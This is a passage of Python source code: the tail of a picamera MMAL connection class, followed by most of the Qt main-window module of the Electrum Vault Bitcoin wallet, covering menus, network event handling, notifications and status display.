# Connected MMAL output ports are made to transfer their
# data to the Python input port
self._source.params[mmal.MMAL_PARAMETER_ZERO_COPY] = True
self._source.enable(self._transfer)
def disable(self):
"""
Disables the connection.
"""
self._enabled = False
self._source.disable()
self._target.disable()
def _transfer(self, port, buf):
while self._enabled:
try:
dest = self._target.get_buffer(timeout=0.01)
except PiCameraPortDisabled:
dest = None
if dest:
dest.copy_from(buf)
try:
self._target.send_buffer(dest)
except PiCameraPortDisabled:
pass
return False
@property
def name(self):
return '%s/%s' % (self._source.name, self._target.name)
def __repr__(self):
try:
return '<MMALPythonConnection "%s">' % self.name
except NameError:
return '<MMALPythonConnection closed>'
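# A minimal sketch of the per-buffer *callback* described in the class
# docstring above: returning None drops (releases) the buffer, returning
# the buffer lets it continue on to the target port, e.g.
# MMALPythonConnection(out_port, in_port, callback=_example_drop_empty).
def _example_drop_empty(connection, buf):
    if buf.length == 0:
        return None
    return buf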
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import base64
import csv
import json
import os
import queue
import shutil
import sys
import threading
import time
import weakref
from decimal import Decimal
from functools import partial
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
import qrcode
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum.address_synchronizer import AddTransactionException
from electrum.bitcoin import COIN, is_address
from electrum.exchange_rate import FxThread
from electrum.i18n import _
from electrum.lnutil import ln_dummy_address
from electrum.logging import Logger
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.plugin import run_hook
from electrum.simple_config import SimpleConfig
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.util import PR_PAID, PR_FAILED
from electrum.util import PR_TYPE_ONCHAIN
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, UserCancelled, profiler,
export_meta, import_meta, bfh, InvalidPassword,
decimal_point_to_base_unit_name, UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum.util import pr_expiration_values
from electrum.version import ELECTRUM_VERSION
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
ThreeKeysWallet)
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .exception_window import Exception_Hook
from .fee_slider import FeeSlider
from .history_list import HistoryList, HistoryModel
from .installwizard import get_wif_help_text
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .three_keys_dialogs import PSBTDialog
from .transaction_dialog import PreviewTxDialog
from .transaction_dialog import show_transaction
from .update_checker import UpdateCheck, UpdateCheckThread
from .util import ButtonsTextEdit
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER)
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
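# A minimal sketch of wiring a StatusBarButton into a window's status bar;
# the icon name and handler are hypothetical stand-ins.
def _example_status_button(window):
    btn = StatusBarButton(
        read_QIcon("status_connected.png"), _("Network"),
        lambda: window.gui_object.show_network_dialog(window))
    window.statusBar().addPermanentWidget(btn)
    return btn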
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus()
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {version} is available").format(version=v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {tab_description}") if show else _("Show {tab_description}")).format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
#self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
#self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.daemon = True
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.need_update.set()
# Once the GUI has been initialized, check whether we want to announce anything, since the callback may have fired before the GUI existed
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Vault"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.get_wallet_label()]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin Vault network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
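# loader() is a factory that freezes k for each menu entry (the same
# late-binding pitfall the Alt+n tab shortcuts guard against)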
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# 'Settings'/'Preferences' are reserved menu names on macOS; use a different label as a workaround
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://bitcoinvault.global"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().host
self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum Vault",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Bitcoin Vault.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Bitcoin Vault system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(self, version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
total_amount += v
self.notify(_("{number} new transactions: Total amount received in the new transactions {amount}")
.format(number=len(txns), amount=self.format_amount_and_units(total_amount)))
else:
for tx in txns:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if not is_relevant:
continue
self.notify(_("New transaction: {amount}").format(amount=self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum Vault", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum Vault", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName that remember the path selected by the user
def getOpenFileName(self, title, filter=""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter=""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
self.request_list.refresh_status()
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
#self.do_update_fee()
self.require_fee_update = False
self.notify_transactions()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte'
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
return decimal_point_to_base_unit_name(self.decimal_point)
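# connect_fields() wires a BTC amount edit and its fiat twin together.
# Each edit's `follows` flag guards against textChanged feedback loops: it is
# set before programmatically updating the sibling field and cleared after.
# The conversions used below are
#     btc_sats = fiat_amount / rate * COIN
#     fiat     = btc_sats * rate / COIN
# e.g. (illustrative numbers only) with rate = 10000 fiat/BTC, entering
# 50.00 in the fiat field sets the BTC field to 0.005.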
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
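# update_status() rebuilds the status-bar summary from network state:
# offline / synchronizing (with answered/sent request counts) / lagging
# (local height vs. server height) / connected. When fully synced it formats
# the confirmed balance plus optional [unconfirmed], [unmatured] and secure
# buckets, and appends the fiat value if the exchange-rate plugin is enabled.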
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({number} blocks)").format(number=server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
balance = self.wallet.get_balance()
c, u, x = balance[:3]
ai, ao = None, None
if len(balance) == 5:
ai, ao = balance[3:]
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
